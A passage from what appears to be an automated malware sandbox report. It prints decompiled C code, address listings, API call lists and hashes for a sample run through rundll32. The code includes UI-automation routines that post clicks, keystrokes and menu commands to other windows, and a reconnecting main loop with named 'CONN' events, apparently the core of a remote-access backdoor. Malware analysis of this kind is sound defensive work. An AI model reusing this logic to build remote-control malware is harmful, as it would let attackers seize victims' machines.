                                                            					asm("o16 nop [eax+eax]");
                                                            					while(_t167 != _t142) {
                                                            						_t142 = _t167;
                                                            						ScreenToClient(_t167,  &_v356);
                                                            						_push(_v356.y);
                                                            						_t167 = ChildWindowFromPoint(_t167, _v356);
                                                            						if(_t167 != 0) {
                                                            							continue;
                                                            						}
                                                            						goto L7;
                                                            					}
                                                            					goto L7;
                                                            				}
                                                            			}






































                                                            0x04636fd6
                                                            0x04636fdc
                                                            0x04636fe3
                                                            0x04636ff5
                                                            0x04636ffd
                                                            0x04636fff
                                                            0x04637006
                                                            0x046370b4
                                                            0x046370ba
                                                            0x046370bd
                                                            0x046370c3
                                                            0x046370c4
                                                            0x046370c6
                                                            0x046370ce
                                                            0x046370d2
                                                            0x046370d6
                                                            0x046370da
                                                            0x046370dd
                                                            0x046370e6
                                                            0x046370e8
                                                            0x046370f0
                                                            0x046371c8
                                                            0x046372d1
                                                            0x00000000
                                                            0x00000000
                                                            0x046372d7
                                                            0x046372da
                                                            0x046372e0
                                                            0x00000000
                                                            0x00000000
                                                            0x046372f2
                                                            0x046372f8
                                                            0x046372fc
                                                            0x0463730e
                                                            0x04637312
                                                            0x0463731a
                                                            0x0463731e
                                                            0x04637321
                                                            0x04637326
                                                            0x046373d2
                                                            0x046373dc
                                                            0x00000000
                                                            0x046373dc
                                                            0x0463732c
                                                            0x00000000
                                                            0x04637343
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463738c
                                                            0x0463738f
                                                            0x04637391
                                                            0x0463739a
                                                            0x00000000
                                                            0x00000000
                                                            0x046373d0
                                                            0x046373d0
                                                            0x00000000
                                                            0x00000000
                                                            0x0463734e
                                                            0x04637360
                                                            0x00000000
                                                            0x00000000
                                                            0x04637384
                                                            0x04637388
                                                            0x00000000
                                                            0x00000000
                                                            0x046373a5
                                                            0x046373a9
                                                            0x00000000
                                                            0x00000000
                                                            0x04637379
                                                            0x00000000
                                                            0x00000000
                                                            0x046373af
                                                            0x046373b3
                                                            0x046373ba
                                                            0x046373c1
                                                            0x00000000
                                                            0x00000000
                                                            0x046373cc
                                                            0x00000000
                                                            0x00000000
                                                            0x0463732c
                                                            0x046371d5
                                                            0x046371e2
                                                            0x046371ea
                                                            0x046371f0
                                                            0x04637205
                                                            0x04637222
                                                            0x04637227
                                                            0x04637235
                                                            0x04637245
                                                            0x0463724d
                                                            0x046372a7
                                                            0x046372ad
                                                            0x046372b6
                                                            0x046372c4
                                                            0x046372c4
                                                            0x00000000
                                                            0x046372b6
                                                            0x04637257
                                                            0x0463725d
                                                            0x04637261
                                                            0x04637270
                                                            0x04637274
                                                            0x04637289
                                                            0x04637295
                                                            0x00000000
                                                            0x04637295
                                                            0x04637095
                                                            0x00000000
                                                            0x04637095
                                                            0x046370fc
                                                            0x04637103
                                                            0x04637111
                                                            0x04637115
                                                            0x00000000
                                                            0x00000000
                                                            0x0463711b
                                                            0x04637122
                                                            0x00000000
                                                            0x0463713b
                                                            0x0463714a
                                                            0x00000000
                                                            0x00000000
                                                            0x04637176
                                                            0x00000000
                                                            0x00000000
                                                            0x04637181
                                                            0x0463718b
                                                            0x0463719b
                                                            0x0463719d
                                                            0x046371bc
                                                            0x0463719f
                                                            0x046371aa
                                                            0x046371aa
                                                            0x00000000
                                                            0x00000000
                                                            0x0463715d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463700c
                                                            0x0463700f
                                                            0x04637013
                                                            0x04637016
                                                            0x0463701a
                                                            0x04637024
                                                            0x04637026
                                                            0x04637026
                                                            0x04637029
                                                            0x0463702f
                                                            0x04637035
                                                            0x04637044
                                                            0x04637048
                                                            0x04637077
                                                            0x0463707c
                                                            0x0463708b
                                                            0x0463708b
                                                            0x04637095
                                                            0x04637095
                                                            0x0463709b
                                                            0x046370b1
                                                            0x046370b1
                                                            0x0463704a
                                                            0x04637050
                                                            0x04637058
                                                            0x0463705c
                                                            0x04637062
                                                            0x04637071
                                                            0x04637075
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04637075
                                                            0x00000000
                                                            0x04637050

                                                            APIs
                                                            • WindowFromPoint.USER32(?,?), ref: 0463701E
                                                            • ScreenToClient.USER32(00000000,?), ref: 0463702F
                                                            • ChildWindowFromPoint.USER32(00000000,00000001,00000001), ref: 0463703E
                                                            • ScreenToClient.USER32(00000000,?), ref: 0463705C
                                                            • ChildWindowFromPoint.USER32(00000000,00000001,00000001), ref: 0463706B
                                                            • PostMessageW.USER32(00000000,?,?,?), ref: 04637095
                                                            • WindowFromPoint.USER32 ref: 046370E0
                                                            • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 0463710F
                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 0463712C
                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0463713B
                                                            • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 0463714A
                                                            • GetWindowPlacement.USER32(00000000,?), ref: 0463718B
                                                            • FindWindowA.USER32(Button,00000000), ref: 046371DC
                                                            • GetWindowRect.USER32(00000000,?), ref: 046371EA
                                                            • PtInRect.USER32(?,00000001,00000001), ref: 046371FD
                                                            • RealGetWindowClass.USER32(00000000,?,00000104), ref: 04637235
                                                            • lstrcmp.KERNEL32(?,#32768), ref: 04637245
                                                            • SendMessageW.USER32(00000000,000001E1,00000000,00000000), ref: 04637257
                                                            • MenuItemFromPoint.USER32(00000000,00000000,?,?), ref: 0463726A
                                                            • GetMenuItemID.USER32(00000000,00000000), ref: 04637274
                                                            • PostMessageW.USER32(00000000,000001E5,00000000,00000000), ref: 04637289
                                                            • PostMessageW.USER32(00000000,00000100,0000000D,00000000), ref: 04637295
                                                            • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 046372A7
                                                            • GetWindowRect.USER32(?,?), ref: 046372FC
                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 04637343
                                                            • MoveWindow.USER32(?,?,00000000,?,00000000,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 04637360
                                                            • MoveWindow.USER32(?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04637379
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0463739A
                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000), ref: 046373C1
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 046373DC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Window$Message$Move$FromPoint$Send$PostRect$ChildClientItemLongMenuScreen$ClassFindPlacementReallstrcmp
                                                            • String ID: #32768$,$Button
                                                            • API String ID: 4148729706-3823977346
                                                            • Opcode ID: 5586d8dc172052163f259867441932df855797be4348c43ed0f23eb4b192d1b9
                                                            • Instruction ID: dfb2415a65f0ed3d8fd9133f5535e17c442f2f04e0c47a316506d46f09f495c2
                                                            • Opcode Fuzzy Hash: 5586d8dc172052163f259867441932df855797be4348c43ed0f23eb4b192d1b9
                                                            • Instruction Fuzzy Hash: 42B19DB2248341BFD7148F64DC4DF6B7BE8EF88716F009A18F555A6281EB74E804DBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 81%
                                                            			E0464B5F0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				short _v204;
                                                            				char _v208;
                                                            				char _v308;
                                                            				char _v309;
                                                            				intOrPtr _v315;
                                                            				char _v316;
                                                            				signed int _v320;
                                                            				char _v340;
                                                            				char _v380;
                                                            				char _v512;
                                                            				void _v516;
                                                            				signed short* _v520;
                                                            				void* _v525;
                                                            				void* _v532;
                                                            				int _v536;
                                                            				void* _v537;
                                                            				signed int _v540;
                                                            				intOrPtr _v544;
                                                            				int _v545;
                                                            				signed short* _v548;
                                                            				void* _v549;
                                                            				void* _v552;
                                                            				signed int _t118;
                                                            				void* _t120;
                                                            				void* _t122;
                                                            				long _t127;
                                                            				void* _t134;
                                                            				signed int _t140;
                                                            				signed int _t143;
                                                            				long _t155;
                                                            				void* _t157;
                                                            				void* _t163;
                                                            				void* _t171;
                                                            				void* _t172;
                                                            				void* _t178;
                                                            				void* _t179;
                                                            				void* _t184;
                                                            				intOrPtr _t186;
                                                            				void* _t188;
                                                            				int _t192;
                                                            				void* _t194;
                                                            				void* _t196;
                                                            				void* _t197;
                                                            				void* _t199;
                                                            				void* _t209;
                                                            				char* _t217;
                                                            				void* _t219;
                                                            				void* _t227;
                                                            				void* _t229;
                                                            				void* _t230;
                                                            				void* _t231;
                                                            				void* _t232;
                                                            				void* _t234;
                                                            				signed int _t240;
                                                            				void* _t247;
                                                            				void* _t253;
                                                            				intOrPtr _t256;
                                                            				void* _t257;
                                                            				long _t261;
                                                            				void* _t263;
                                                            				void* _t265;
                                                            				signed int _t268;
                                                            				signed int _t270;
                                                            				void* _t271;
                                                            				void* _t273;
                                                            				void* _t274;
                                                            
                                                            				_t274 = __eflags;
                                                            				_t242 = __edi;
                                                            				_t270 = (_t268 & 0xfffffff8) - 0x22c;
                                                            				_t118 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t118 ^ _t270;
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				_t120 = L0464ABF0();
                                                            				_v532 = 0;
                                                            				_t253 = _t120;
                                                            				_v536 = 0;
                                                            				L04649390(__ebx,  &_v540, __edi, _t253, _t274, L"Control");
                                                            				if(_v540 != 0 || _t253 != 0 && _v540 != 0) {
                                                            					_t122 = _v532;
                                                            					__eflags = _t122;
                                                            					if(_t122 != 0) {
                                                            						CloseHandle(_t122);
                                                            					}
                                                            					goto L73;
                                                            				} else {
                                                            					SetErrorMode(1);
                                                            					_t127 = GetTickCount();
                                                            					wsprintfA( &_v316, "Global\\%d%d", GetTickCount(), _t127);
                                                            					_t271 = _t270 + 0x10;
                                                            					_t278 = _t253;
                                                            					if(_t253 != 0) {
                                                            						CloseHandle(CreateThread(0, 0, E0464C0A0, 0, 0, 0));
                                                            						if(E0463E880(CloseHandle, _t242, CreateThread, _t278) > 0) {
                                                            							CloseHandle(CreateThread(0, 0, E0463E6E0, 0, 0, 0));
                                                            						}
                                                            					}
                                                            					L0463A330();
                                                            					_t209 = 0;
                                                            					_v552 = 0;
                                                            					while(1) {
                                                            						L7:
                                                            						_t134 = memcpy( &_v516, 0x4686318, 0x31 << 2);
                                                            						_t271 = _t271 + 0xc;
                                                            						asm("movsw");
                                                            						_t281 = _t134;
                                                            						if(_t134 == 0) {
                                                            							_t199 = L04655B14(0x4686318, _t281, 0x3c);
                                                            							_t271 = _t271 + 4;
                                                            							_t134 = E046362B0(_t209, _t199, 0x468637a);
                                                            							 *0x46878d0 = _t134;
                                                            						}
                                                            						if( *((intOrPtr*)(_t134 + 0x38)) != 0) {
                                                            							memcpy( &_v516, 0x46863de, 0x31 << 2);
                                                            							_t271 = _t271 + 0xc;
                                                            							asm("movsw");
                                                            						}
                                                            						_t256 = 0;
                                                            						_v544 = 0;
                                                            						if((_v320 & 0x0000ffff) + 1 == 0) {
                                                            							break;
                                                            						}
                                                            						_t247 = _v552;
                                                            						do {
                                                            							if(_t247 != 0) {
                                                            								E04638C90(_t247);
                                                            								_t147 =  *(_t247 + 0x50);
                                                            								if( *(_t247 + 0x50) != 0) {
                                                            									L04655B0F(_t147);
                                                            									_t271 = _t271 + 4;
                                                            								}
                                                            								 *(_t247 + 0x58) = 0;
                                                            								 *(_t247 + 0x50) = 0;
                                                            								 *(_t247 + 0x54) = 0;
                                                            								 *((intOrPtr*)(_t247 + 0x30)) = 0x467df88;
                                                            								 *((intOrPtr*)(_t247 + 0x28)) = 0x467e008;
                                                            								_t148 =  *((intOrPtr*)(_t247 + 0x1c));
                                                            								if( *((intOrPtr*)(_t247 + 0x1c)) != 0) {
                                                            									L04655B0F(_t148);
                                                            									_t271 = _t271 + 4;
                                                            								}
                                                            								_push(0x60);
                                                            								E04655B47(_t247);
                                                            								_t271 = _t271 + 8;
                                                            								_t247 = 0;
                                                            								_v552 = 0;
                                                            							}
                                                            							if(_t209 != 0) {
                                                            								 *( *_t209)(1);
                                                            								_t209 = 0;
                                                            							}
                                                            							if(_t256 != 0) {
                                                            								E0464B400(_t209,  &_v204, _t247, _t256,  &_v380,  &_v340);
                                                            								_t271 = _t271 + 8;
                                                            								goto L26;
                                                            							} else {
                                                            								_t219 = 0;
                                                            								asm("o16 nop [eax+eax]");
                                                            								do {
                                                            									_t143 =  *(_t271 + _t219 + 0x38) & 0x0000ffff;
                                                            									_t219 = _t219 + 2;
                                                            									 *(_t271 + _t219 + 0x166) = _t143;
                                                            								} while (_t143 != 0);
                                                            								L26:
                                                            								_t140 = 0;
                                                            								_v540 = 0;
                                                            								do {
                                                            									_t257 =  &_v516;
                                                            									_t258 = _t257 + _t140 * 2;
                                                            									_v520 = _t257 + _t140 * 2;
                                                            									if( *(_t257 + _t140 * 2) == 0) {
                                                            										goto L38;
                                                            									}
                                                            									_t217 =  &_v512;
                                                            									_t294 =  *((short*)(_t217 + _t140 * 2));
                                                            									_v548 = _t217 + _t140 * 2;
                                                            									if( *((short*)(_t217 + _t140 * 2)) == 0) {
                                                            										goto L38;
                                                            									}
                                                            									_t247 = L04655B14(_t258, _t294, 0x60);
                                                            									_v552 = _t247;
                                                            									E04637980(_t247);
                                                            									 *((intOrPtr*)(_t247 + 0x28)) = 0x467e048;
                                                            									 *(_t247 + 0x2c) = 0;
                                                            									 *((intOrPtr*)(_t247 + 0x30)) = 0x467e024;
                                                            									 *(_t247 + 0x34) = 0;
                                                            									 *(_t247 + 0x58) = 0;
                                                            									 *(_t247 + 0x50) = 0;
                                                            									 *(_t247 + 0x54) = 0;
                                                            									 *(_t247 + 0x40) = 0;
                                                            									 *(_t247 + 0x20) = 0;
                                                            									 *(_t247 + 0x24) = 0;
                                                            									 *(_t247 + 0x38) = 0;
                                                            									 *((char*)(_t247 + 0x3c)) = 0x43;
                                                            									E04638AE0(_t247,  *_t258 & 0x0000ffff);
                                                            									_t155 = GetTickCount();
                                                            									_t271 = _t271 + 4 - 0xc;
                                                            									_t261 = _t155;
                                                            									_push( *_v552 & 0x0000ffff);
                                                            									_push( &_v208);
                                                            									_t157 = L04638BB0(_t247);
                                                            									_t295 = _t157;
                                                            									if(_t157 == 0) {
                                                            										L37:
                                                            										_t140 = _v540;
                                                            										goto L38;
                                                            									}
                                                            									_v536 = GetTickCount() - _t261;
                                                            									_t209 = L04655B14(_t261, _t295, 0x11c);
                                                            									_t273 = _t271 + 4;
                                                            									_t262 =  *_v520 & 0x0000ffff;
                                                            									_t163 = _v552;
                                                            									 *_t209 = 0x467e8b0;
                                                            									 *((intOrPtr*)(_t209 + 4)) = _t163;
                                                            									 *(_t163 + 0x38) = _t209;
                                                            									 *((intOrPtr*)(_t209 + 8)) = CreateEventW(0, 1, 0, 0);
                                                            									_t69 = _t209 + 0xc; // 0xc
                                                            									 *_t209 = 0x467e1a0;
                                                            									 *0x46878d4 =  *_v520 & 0x0000ffff;
                                                            									lstrcpyA(_t69,  &_v308);
                                                            									lstrcpyW(0x46878d8,  &_v204);
                                                            									_t170 =  *0x46878d0; // 0x0
                                                            									 *0x4684760 =  *_v548 & 0x0000ffff;
                                                            									_t247 = _v552;
                                                            									 *(_t209 + 0x118) = 0;
                                                            									 *(_t209 + 0x114) = 0;
                                                            									 *((char*)(_t209 + 0x110)) = 0;
                                                            									 *(_t247 + 0x38) = _t209;
                                                            									_t296 = _t170;
                                                            									if(_t170 == 0) {
                                                            										_t197 = L04655B14(_t262, _t296, 0x3c);
                                                            										_t273 = _t273 + 4;
                                                            										 *0x46878d0 = E046362B0(_t209, _t197, _t247);
                                                            									}
                                                            									_t227 = _t247;
                                                            									_t171 = E0464B0C0(_t209, _t227, _v536, _t247, _t262, 0x46864a4, L"20220829", L"v20220829",  *((intOrPtr*)(_t170 + 0x30)));
                                                            									_t271 = _t273 + 0x10;
                                                            									if(_t171 == 0) {
                                                            										goto L37;
                                                            									} else {
                                                            										_t263 = 0;
                                                            										while( *((char*)(_t209 + 0x110)) == 0) {
                                                            											Sleep(0x3e8);
                                                            											_t263 = _t263 + 1;
                                                            											if(_t263 < 0x3c) {
                                                            												continue;
                                                            											}
                                                            											if( *((char*)(_t209 + 0x110)) != 0) {
                                                            												break;
                                                            											}
                                                            											goto L37;
                                                            										}
                                                            										__eflags = _t247;
                                                            										if(__eflags == 0) {
                                                            											goto L40;
                                                            										}
                                                            										__eflags = _t209;
                                                            										if(__eflags == 0) {
                                                            											goto L40;
                                                            										}
                                                            										_t172 =  *0x46878d0; // 0x0
                                                            										_v316 = 0xa0;
                                                            										__eflags = _t172;
                                                            										if(__eflags == 0) {
                                                            											_t196 = L04655B14(_t263, __eflags, 0x3c);
                                                            											_t271 = _t271 + 4;
                                                            											_t227 = _t196;
                                                            											_t172 = E046362B0(_t209, _t227, _t247);
                                                            											 *0x46878d0 = _t172;
                                                            										}
                                                            										_push(_t227);
                                                            										_push(0x3f);
                                                            										_v315 =  *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x28)) + 0x14));
                                                            										_push(5);
                                                            										_push( &_v316);
                                                            										E04631C60( *((intOrPtr*)(_t209 + 4)));
                                                            										do {
                                                            											_t178 = OpenEventA(0x1f0003, 0,  &_v309);
                                                            											_t240 =  *(_t247 + 0x5c) & 0x0000ffff;
                                                            											_v549 = _t178;
                                                            											__eflags = _t240 - 1;
                                                            											if(_t240 != 1) {
                                                            												L49:
                                                            												__eflags = _t240 - 2;
                                                            												if(_t240 != 2) {
                                                            													L56:
                                                            													_t179 =  *(_t209 + 0x118);
                                                            													_v537 = _t179;
                                                            													_v545 = 0;
                                                            													__eflags = _t179;
                                                            													if(_t179 == 0) {
                                                            														L61:
                                                            														_t229 =  *0x46878cc; // 0x0
                                                            														__eflags = _t229;
                                                            														if(_t229 != 0) {
                                                            															_t186 =  *((intOrPtr*)(_t229 + 4));
                                                            															__eflags =  *(_t186 + 4);
                                                            															if( *(_t186 + 4) != 0) {
                                                            																 *((char*)(_t229 + 1)) = 0;
                                                            																E0463A290(_t229, _t229);
                                                            																 *0x46878cc = 0;
                                                            															}
                                                            														}
                                                            														_t265 = _v549;
                                                            														__eflags = _t265;
                                                            														if(__eflags == 0) {
                                                            															goto L7;
                                                            														} else {
                                                            															_t230 =  *(_t247 + 0x20);
                                                            															 *(_t247 + 0x44) = 1;
                                                            															__eflags = _t230;
                                                            															if(_t230 != 0) {
                                                            																L68:
                                                            																 *((intOrPtr*)( *_t230 + 4))();
                                                            																L69:
                                                            																CloseHandle(_t265);
                                                            																SetErrorMode(0);
                                                            																_t184 = _v525;
                                                            																__eflags = _t184;
                                                            																if(_t184 != 0) {
                                                            																	CloseHandle(_t184);
                                                            																}
                                                            																L73:
                                                            																__eflags = _v8 ^ _t270;
                                                            																return E04655AFE(_v8 ^ _t270);
                                                            															}
                                                            															_t231 =  *(_t247 + 0x24);
                                                            															__eflags = _t231;
                                                            															if(_t231 == 0) {
                                                            																goto L69;
                                                            															}
                                                            															_t230 = _t231 + 4;
                                                            															__eflags = _t230;
                                                            															goto L68;
                                                            														}
                                                            													} else {
                                                            														goto L57;
                                                            													}
                                                            													while(1) {
                                                            														L57:
                                                            														Sleep(0x3e8);
                                                            														_t188 = OpenEventA(0x1f0003, 1, "Global\\CONN0000000000");
                                                            														__eflags = _t188;
                                                            														if(_t188 != 0) {
                                                            															break;
                                                            														}
                                                            														_t192 = _v545 + 1;
                                                            														_v545 = _t192;
                                                            														__eflags = _t192 - _v537;
                                                            														if(_t192 < _v537) {
                                                            															continue;
                                                            														}
                                                            														goto L61;
                                                            													}
                                                            													CloseHandle(_t188);
                                                            													lstrcpyW(0x46864a4, L"[CONN]");
                                                            													goto L61;
                                                            												}
                                                            												_t232 =  *(_t247 + 0x24);
                                                            												__eflags = _t232;
                                                            												if(_t232 == 0) {
                                                            													goto L56;
                                                            												}
                                                            												_t194 =  *((intOrPtr*)( *((intOrPtr*)(_t232 + 4)) + 0x40))();
                                                            												__eflags = _t194;
                                                            												if(_t194 == 0) {
                                                            													goto L56;
                                                            												}
                                                            												__eflags =  *(_t247 + 0x48);
                                                            												L53:
                                                            												if(__eflags == 0) {
                                                            													goto L56;
                                                            												}
                                                            												goto L54;
                                                            											}
                                                            											_t234 =  *(_t247 + 0x20);
                                                            											__eflags = _t234;
                                                            											if(_t234 == 0) {
                                                            												goto L49;
                                                            											}
                                                            											__eflags =  *((intOrPtr*)( *_t234 + 0x40))();
                                                            											goto L53;
                                                            											L54:
                                                            											Sleep(0x1f4);
                                                            											__eflags = _v549;
                                                            										} while (_v549 == 0);
                                                            										goto L61;
                                                            									}
                                                            									L38:
                                                            									_t140 = _t140 + 1;
                                                            									_v540 = _t140;
                                                            								} while (_t140 < 2);
                                                            							}
                                                            							_t256 = _v544 + 1;
                                                            							_v544 = _t256;
                                                            						} while (_t256 < (_v320 & 0x0000ffff) + 1);
                                                            						break;
                                                            					}
                                                            					L40:
                                                            					Sleep(0x2710);
                                                            					goto L7;
                                                            				}
                                                            			}






































































                                                            0x0464b5f0
                                                            0x0464b5f0
                                                            0x0464b5f6
                                                            0x0464b5fc
                                                            0x0464b603
                                                            0x0464b60a
                                                            0x0464b60b
                                                            0x0464b60c
                                                            0x0464b60d
                                                            0x0464b61b
                                                            0x0464b623
                                                            0x0464b625
                                                            0x0464b62d
                                                            0x0464b637
                                                            0x0464bb8a
                                                            0x0464bb8e
                                                            0x0464bb90
                                                            0x0464bb93
                                                            0x0464bb93
                                                            0x00000000
                                                            0x0464b64c
                                                            0x0464b64e
                                                            0x0464b65a
                                                            0x0464b66d
                                                            0x0464b679
                                                            0x0464b67c
                                                            0x0464b67e
                                                            0x0464b698
                                                            0x0464b6a1
                                                            0x0464b6b5
                                                            0x0464b6b5
                                                            0x0464b6a1
                                                            0x0464b6b7
                                                            0x0464b6be
                                                            0x0464b6c0
                                                            0x0464b6d0
                                                            0x0464b6d0
                                                            0x0464b6e3
                                                            0x0464b6e3
                                                            0x0464b6e5
                                                            0x0464b6e7
                                                            0x0464b6e9
                                                            0x0464b6ed
                                                            0x0464b6f2
                                                            0x0464b6f7
                                                            0x0464b6fc
                                                            0x0464b6fc
                                                            0x0464b705
                                                            0x0464b715
                                                            0x0464b715
                                                            0x0464b717
                                                            0x0464b717
                                                            0x0464b721
                                                            0x0464b723
                                                            0x0464b72a
                                                            0x00000000
                                                            0x00000000
                                                            0x0464b730
                                                            0x0464b734
                                                            0x0464b736
                                                            0x0464b73a
                                                            0x0464b73f
                                                            0x0464b744
                                                            0x0464b747
                                                            0x0464b74c
                                                            0x0464b74c
                                                            0x0464b74f
                                                            0x0464b756
                                                            0x0464b75d
                                                            0x0464b764
                                                            0x0464b76b
                                                            0x0464b772
                                                            0x0464b777
                                                            0x0464b77a
                                                            0x0464b77f
                                                            0x0464b77f
                                                            0x0464b782
                                                            0x0464b785
                                                            0x0464b78a
                                                            0x0464b78d
                                                            0x0464b78f
                                                            0x0464b78f
                                                            0x0464b795
                                                            0x0464b79d
                                                            0x0464b79f
                                                            0x0464b79f
                                                            0x0464b7a3
                                                            0x0464b7de
                                                            0x0464b7e3
                                                            0x00000000
                                                            0x0464b7a5
                                                            0x0464b7a5
                                                            0x0464b7a7
                                                            0x0464b7b0
                                                            0x0464b7b0
                                                            0x0464b7b5
                                                            0x0464b7b8
                                                            0x0464b7c0
                                                            0x0464b7e6
                                                            0x0464b7e6
                                                            0x0464b7e8
                                                            0x0464b7f0
                                                            0x0464b7f0
                                                            0x0464b7f9
                                                            0x0464b7fc
                                                            0x0464b800
                                                            0x00000000
                                                            0x00000000
                                                            0x0464b806
                                                            0x0464b80a
                                                            0x0464b812
                                                            0x0464b816
                                                            0x00000000
                                                            0x00000000
                                                            0x0464b826
                                                            0x0464b82b
                                                            0x0464b831
                                                            0x0464b836
                                                            0x0464b83f
                                                            0x0464b846
                                                            0x0464b84d
                                                            0x0464b854
                                                            0x0464b85b
                                                            0x0464b862
                                                            0x0464b86a
                                                            0x0464b871
                                                            0x0464b878
                                                            0x0464b87f
                                                            0x0464b886
                                                            0x0464b88a
                                                            0x0464b88f
                                                            0x0464b899
                                                            0x0464b89c
                                                            0x0464b8a8
                                                            0x0464b8a9
                                                            0x0464b8ac
                                                            0x0464b8b1
                                                            0x0464b8b3
                                                            0x0464b9c6
                                                            0x0464b9c6
                                                            0x00000000
                                                            0x0464b9c6
                                                            0x0464b8c6
                                                            0x0464b8cf
                                                            0x0464b8d1
                                                            0x0464b8da
                                                            0x0464b8ea
                                                            0x0464b8ee
                                                            0x0464b8f4
                                                            0x0464b8f7
                                                            0x0464b900
                                                            0x0464b90b
                                                            0x0464b90e
                                                            0x0464b915
                                                            0x0464b91c
                                                            0x0464b92f
                                                            0x0464b935
                                                            0x0464b93a
                                                            0x0464b941
                                                            0x0464b945
                                                            0x0464b94f
                                                            0x0464b959
                                                            0x0464b960
                                                            0x0464b963
                                                            0x0464b965
                                                            0x0464b969
                                                            0x0464b96e
                                                            0x0464b978
                                                            0x0464b978
                                                            0x0464b984
                                                            0x0464b995
                                                            0x0464b99a
                                                            0x0464b99f
                                                            0x00000000
                                                            0x0464b9a1
                                                            0x0464b9a1
                                                            0x0464b9a3
                                                            0x0464b9b1
                                                            0x0464b9b7
                                                            0x0464b9bb
                                                            0x00000000
                                                            0x00000000
                                                            0x0464b9c4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464b9c4
                                                            0x0464ba02
                                                            0x0464ba04
                                                            0x00000000
                                                            0x00000000
                                                            0x0464ba06
                                                            0x0464ba08
                                                            0x00000000
                                                            0x00000000
                                                            0x0464ba0a
                                                            0x0464ba0f
                                                            0x0464ba17
                                                            0x0464ba19
                                                            0x0464ba1d
                                                            0x0464ba22
                                                            0x0464ba25
                                                            0x0464ba27
                                                            0x0464ba2c
                                                            0x0464ba2c
                                                            0x0464ba34
                                                            0x0464ba38
                                                            0x0464ba3d
                                                            0x0464ba4b
                                                            0x0464ba4d
                                                            0x0464ba4e
                                                            0x0464ba60
                                                            0x0464ba6f
                                                            0x0464ba75
                                                            0x0464ba79
                                                            0x0464ba7d
                                                            0x0464ba80
                                                            0x0464ba92
                                                            0x0464ba92
                                                            0x0464ba95
                                                            0x0464bac1
                                                            0x0464bac1
                                                            0x0464bac7
                                                            0x0464bacb
                                                            0x0464bad3
                                                            0x0464bad5
                                                            0x0464bb1c
                                                            0x0464bb1c
                                                            0x0464bb22
                                                            0x0464bb24
                                                            0x0464bb26
                                                            0x0464bb29
                                                            0x0464bb2d
                                                            0x0464bb30
                                                            0x0464bb34
                                                            0x0464bb39
                                                            0x0464bb39
                                                            0x0464bb2d
                                                            0x0464bb43
                                                            0x0464bb47
                                                            0x0464bb49
                                                            0x00000000
                                                            0x0464bb4f
                                                            0x0464bb4f
                                                            0x0464bb52
                                                            0x0464bb59
                                                            0x0464bb5b
                                                            0x0464bb67
                                                            0x0464bb69
                                                            0x0464bb6c
                                                            0x0464bb73
                                                            0x0464bb77
                                                            0x0464bb7d
                                                            0x0464bb81
                                                            0x0464bb83
                                                            0x0464bb86
                                                            0x0464bb86
                                                            0x0464bb99
                                                            0x0464bba5
                                                            0x0464bbaf
                                                            0x0464bbaf
                                                            0x0464bb5d
                                                            0x0464bb60
                                                            0x0464bb62
                                                            0x00000000
                                                            0x00000000
                                                            0x0464bb64
                                                            0x0464bb64
                                                            0x00000000
                                                            0x0464bb64
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464bad7
                                                            0x0464bad7
                                                            0x0464badc
                                                            0x0464baea
                                                            0x0464baf0
                                                            0x0464baf2
                                                            0x00000000
                                                            0x00000000
                                                            0x0464baf8
                                                            0x0464baf9
                                                            0x0464bafd
                                                            0x0464bb01
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464bb03
                                                            0x0464bb06
                                                            0x0464bb16
                                                            0x00000000
                                                            0x0464bb16
                                                            0x0464ba97
                                                            0x0464ba9a
                                                            0x0464ba9c
                                                            0x00000000
                                                            0x00000000
                                                            0x0464baa4
                                                            0x0464baa7
                                                            0x0464baa9
                                                            0x00000000
                                                            0x00000000
                                                            0x0464baab
                                                            0x0464baaf
                                                            0x0464baaf
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0464baaf
                                                            0x0464ba82
                                                            0x0464ba85
                                                            0x0464ba87
                                                            0x00000000
                                                            0x00000000
                                                            0x0464ba8e
                                                            0x00000000
                                                            0x0464bab1
                                                            0x0464bab6
                                                            0x0464bab8
                                                            0x0464bab8
                                                            0x00000000
                                                            0x0464babf
                                                            0x0464b9ca
                                                            0x0464b9ca
                                                            0x0464b9cb
                                                            0x0464b9cf
                                                            0x0464b7f0
                                                            0x0464b9e4
                                                            0x0464b9e6
                                                            0x0464b9ea
                                                            0x00000000
                                                            0x0464b734
                                                            0x0464b9f2
                                                            0x0464b9f7
                                                            0x00000000
                                                            0x0464b9f7

                                                            APIs
